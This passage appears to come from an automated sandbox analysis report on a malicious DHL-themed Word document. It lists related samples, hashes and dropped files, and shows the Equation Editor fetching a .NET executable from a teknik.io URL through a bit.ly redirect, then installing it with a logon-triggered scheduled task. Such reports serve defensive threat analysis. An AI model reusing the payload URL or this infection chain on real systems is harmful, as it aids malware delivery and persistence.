	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.082453199197871
Encrypted:	false
SSDEEP:	6:kKZlpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:hlw3kPlE99SNxAhUeo+aKt
MD5:	91D8AD83CB8EF0AFD97E5321D62C5954
SHA1:	5FF9C2C6DED439EF4559D97B03FE494A3D43F1F6
SHA-256:	1AA7E8338C2DD6934B9CD685DF8A11437D2237793F6A12D8538AD0D7855263F7
SHA-512:	9602C93CC0E05A1FB72A7E0EE16F3E968D93A862426EBC3F75198389A4329B926CB4F4BE158CCB1958D68FCC25EDD964CBA3AC5691FFB98BC5E3D11BB9679453
Malicious:	false
Reputation:	low
Preview:	p...... .........H0=....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0294634724686764
Encrypted:	false
SSDEEP:	3:kkFklaiHlXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKXiHlJliBAIdQZV7eAYLit
MD5:	517B17724F90707F513C73FEF3A6D0D1
SHA1:	BC1D646870CF45349CEB32C226A5E591F2F7EE06
SHA-256:	A763C1A0EF0339B3BB4A98FA69155A0AF7923F1144787FAA219A43660B8D9626
SHA-512:	FFB7C2E81465A21D7551D0C9B4B7890B37F09910B16D534F29C42A28FD80B5022621C5CA7171F9C48343F07D87BFAD847EC2C074280DB8B5114B75856C17C1CD
Malicious:	false
Reputation:	low
Preview:	p...... ....`....V.=....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	766976
Entropy (8bit):	7.940274777998683
Encrypted:	false
SSDEEP:	12288:sEoF4lSePJI+f8Y+6I7MoPrYeAZDGfQ0lSzujpMEOoeYw3LLUEMthvoPTG16KL:GYPJnf876I7KTZDYizutM3oeLCsG16KL
MD5:	8C596990203F7D15651498FDBA84B5F3
SHA1:	BCABAE5C0B3CA8E9558AD3F57C3A10E8B5AE6F74
SHA-256:	A98A739B9AB7B06BF2833F6EF4AA97DB1B7C2441365C7104E878C8B29BF90F74
SHA-512:	1CBC6440FE45B66E5A72A41312B1195E25B64EDE5F97BFDE98CD9FDCABE30C9434FCEED40282D2453B7B25823AAEF7CB26F4D910E1EBA6FB95FB2A83D3968D93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	https://u.teknik.io/HOMqO.txt
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5`..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Ho..p3......4........%..........................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r!..p~....o......t.....+......0..!........(....r1..p~....o......t.....+......0...........r5..p.+....0...........rA..p.+..".(.....^..}.....(.......(%.......(.......0..;........rQ..pr...p.(...........,..(......+..s......o .....(!.....*..0..I........r...pr...p.(.......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3kijui1[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.586537953698698
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyZHL+lHRMIkFSXbKFvNGb:qFzLIeco3XLx92ZHqjMIMSLWQb
MD5:	CBE7C488F40856500F96E7A2241E446C
SHA1:	D423F97F06B3DE1858963FB4C9DFC91C8903E583
SHA-256:	2C36C438DDE1A68205FCCD8AD61CA9FEC62445C6BCCEBD3CB7D2FF65721A4C92
SHA-512:	3D63AB45EA443FBAE45654F07FCCBB2F99DA9F68DE2AC93AD95CF8FC7C741792E7F22AC78CD9FCE44B73BD4B1439B15AA4162A92289A4F9568F22899D043B6B8
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/HOMqO.txt">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7621A4C2-B642-4F8D-8632-93AA6D767CE8}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849456
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1Mz5
MD5:	902213563D2195F9EFB916FFA17781F4
SHA1:	DF42BEC902D37E2350892716A046B7C68E784D4D
SHA-256:	8ABD0E4642BACA7D3EE404C48AF7E21DD219F823A8BFF5D00D3F2CF5346A662F
SHA-512:	F4E5C3667E8D1ED541AF894E2A28A31044A06A877C27E619FCA28AF36F889864D5342A928B8F2BF3529C71CEDE7BC113A6712E1CB7D436E0289BB032A4D6F439
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F6BABB-61BE-41BF-89DB-AF92964D1C77}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F060F5F7-4AFC-467A-BEBB-A714D3C0AD58}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2662892
Entropy (8bit):	4.149677302216823
Encrypted:	false
SSDEEP:	49152:VOMiODiADi6DhODiOqiOCiODiO+pODiODY6DiODiLliODiOFFODiO6i8DiODNOk9:VtiyiMimhyiriDiyifpyiyYmiyipiyiE
MD5:	24CEA4BCB674A5118CE282F6762B389B
SHA1:	3BBF31B912CC878BD05D4E6001C130267D02DCA5
SHA-256:	63A8D9934C155B0F5871E965AB66EAF604DD97E055B5B333D79E5D96D1D4CA21
SHA-512:	B924C69B78E6B09104D442EF7F33BA2E4759003311EDC3320412041D15B19B0AE1F138788FB431C29628F18733AFF86DFB171FE106968A5B44AF20A969BFDBDF
Malicious:	false
Preview:	..@.A.p.J.n.b.S.m.E.I.k.B.Y.w.P.B.r.@.-.D.y.s.i.v.y.j.z.Z.m.o.I.e.C.P.i.F.<.e.h.&.&.0._.M.-.C._.g.-.-._.-.d.,.6.4.>.3.2.9.9.7.$.C.v.>.y.t.=.n.5.\|.:.%._.>.j.n.8.%.b.m.;.=.u...2.8..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\Cab36BA.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar36BB.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmpA738.tmp Download File
Process:	C:\Users\Public\69577.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1625
Entropy (8bit):	5.152841578145327
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB5tn:cbhZ7ClNQi/rydbz9I3YODOLNdq3N
MD5:	5245C8FADF559EA119C2B4F0A9D0E959
SHA1:	AF3109524DF7E165CBB7438046D1770F84B312EC
SHA-256:	07D9EF78586F22DF3C195132D412ECDDE4041CBECF40EA8B93F7FEDBBADF0A7D
SHA-512:	933C89DB8D05C73F7FE2FA916B21DC64D26ABD29749A473D0C8BBAB372F41380343F00F634C7694A59D9DABE7905B9FAC45600B755FDAEF7EA6DFE7FF0F89ED7
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Feb 24 19:53:30 2021, length=1380809, window=hide
Category:	dropped
Size (bytes):	2568
Entropy (8bit):	4.614979350110804
Encrypted:	false
SSDEEP:	48:8U+2/XT3Iknr6RMQh2U+2/XT3Iknr6RMQ/:8U+2/XLIk+RMQh2U+2/XLIk+RMQ/
MD5:	45856AD0800B606769734B9E179724CE
SHA1:	FA62F66A4BE7DFFAA55D5A37B36692D37D37204D
SHA-256:	C47FBE6840D5A83DDB91BE629F36E7E5F8B9065C8D6C145DCBC7D1314515D80A
SHA-512:	4B26A3C829BD05F7E3C9466FBEFB0BA084561B59004334AFA4223867F5BF9D5756729A52DF32651BF6265802095B502DECF07080CE5CE4BF520E7E4DFEA06622
Malicious:	false
Preview:	L..................F.... ...V.9..{..V.9..{...D..............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....XR.. .DHL887~1.DOC..........Q.y.Q.y...8.....................D.H.L.8.8.7.0.0.4.5.6.X.X.X.X._.C.O.N.F.I.R.M.A.T.I.O.N._.B.O.O.K.I.N.G._.R.E.F.E.R.E.N.C.E._.B.J.C.4.0.0.6.1.8.0.9.2.9.0.9.y.y...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.H.L.8.8.7.0.0.4.5.6.X.X.X.X._.C.O.N.F.I.R.M.A.T.I.O.N._.B.O.O.K.I.N.G._.R.E.F.E.R.E.N.C.E._.B.J.C.4.0.0.6.1.8.0.9.2.9.0.9.y.y..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	230
Entropy (8bit):	4.936063557817037
Encrypted:	false
SSDEEP:	6:M3r7SrwRwv2L5BA5Z7SrwRwv2L5Bvr7SrwRwv2L5Bs:M3Kcuv29BE4cuv29BvKcuv29Bs
MD5:	7C7F0F84BC6FC83DE18097FAF4BB388E
SHA1:	14383447FD949202E183667994DAEA8564C28726
SHA-256:	DADAF56E2CF5C8B6327649D93F5E5BBD9DD3DE00A6C00FAF230169A40EF020CE
SHA-512:	AEE284DB2044345C31DCD42C171289E9973D027CFC4E85F1E3143B51ED1DE6B5E908C5413DE7E780AEC7F2AE6AFF088F5DC8333EF71BE28B41DA5CA867ACC4B7
Malicious:	false
Preview:	[doc]..DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK=0..DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK=0..[doc]..DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	90
Entropy (8bit):	4.382635874561578
Encrypted:	false
SSDEEP:	3:jvxVN/uGfWci2qidOVjkSyQ/:VVNBfWci2l6jkY
MD5:	DBAAC00B2E0F03C3853EA9B26115EBE0
SHA1:	F62014A05A1577AC5B4E059D45E332D41AA424FB
SHA-256:	175538754FBE648543573E2860F44A34C2D524140C260D2D020B4E1266336A0E
SHA-512:	2113A1FBA1233134D17B42473903A74EF0236EEC49D599226E54F661123E87D0541324036C1A8702886DB0E0D80158003036970F598FC96C7927D5CCE459FC3C
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l1obRp-93e7878892ed3a82aa-00m.bit.ly/.1536.2057545856.30906389.2314061830.30870255.*.

C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe Download File
Process:	C:\Users\Public\69577.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	766976
Entropy (8bit):	7.940274777998683
Encrypted:	false
SSDEEP:	12288:sEoF4lSePJI+f8Y+6I7MoPrYeAZDGfQ0lSzujpMEOoeYw3LLUEMthvoPTG16KL:GYPJnf876I7KTZDYizutM3oeLCsG16KL
MD5:	8C596990203F7D15651498FDBA84B5F3
SHA1:	BCABAE5C0B3CA8E9558AD3F57C3A10E8B5AE6F74
SHA-256:	A98A739B9AB7B06BF2833F6EF4AA97DB1B7C2441365C7104E878C8B29BF90F74
SHA-512:	1CBC6440FE45B66E5A72A41312B1195E25B64EDE5F97BFDE98CD9FDCABE30C9434FCEED40282D2453B7B25823AAEF7CB26F4D910E1EBA6FB95FB2A83D3968D93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5`..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Ho..p3......4........%..........................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r!..p~....o......t.....+......0..!........(....r1..p~....o......t.....+......0...........r5..p.+....0...........rA..p.+..".(.....^..}.....(.......(%.......(.......0..;........rQ..pr...p.(...........,..(......+..s......o .....(!.....*..0..I........r...pr...p.(.......

C:\Users\user\Desktop\~$L88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	766976
Entropy (8bit):	7.940274777998683
Encrypted:	false
SSDEEP:	12288:sEoF4lSePJI+f8Y+6I7MoPrYeAZDGfQ0lSzujpMEOoeYw3LLUEMthvoPTG16KL:GYPJnf876I7KTZDYizutM3oeLCsG16KL
MD5:	8C596990203F7D15651498FDBA84B5F3
